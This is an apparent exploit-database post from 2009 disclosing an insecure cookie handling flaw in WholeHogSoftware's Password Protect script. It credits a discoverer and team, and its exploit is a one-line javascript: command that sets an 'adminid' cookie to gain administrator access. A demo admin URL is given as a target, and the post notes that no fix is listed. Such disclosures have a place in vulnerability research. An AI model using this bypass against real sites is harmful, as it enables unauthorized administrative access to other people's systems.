WholeHogSoftware Password Protect Insecure Cookie Handling Vuln

2009-02-03 08:41:33

###########################################################################
[+] erability
[+] Script :Password Protect
[+] Site :http://wholehogsoftware.com
[+] Detay :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced
[+] Discovered By Mountassif Moad

[+] www.v4-team.com

[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/password_protect_enhanced/admin

#

Fixes

No fixes

In order to submit a new fix you need to be registered.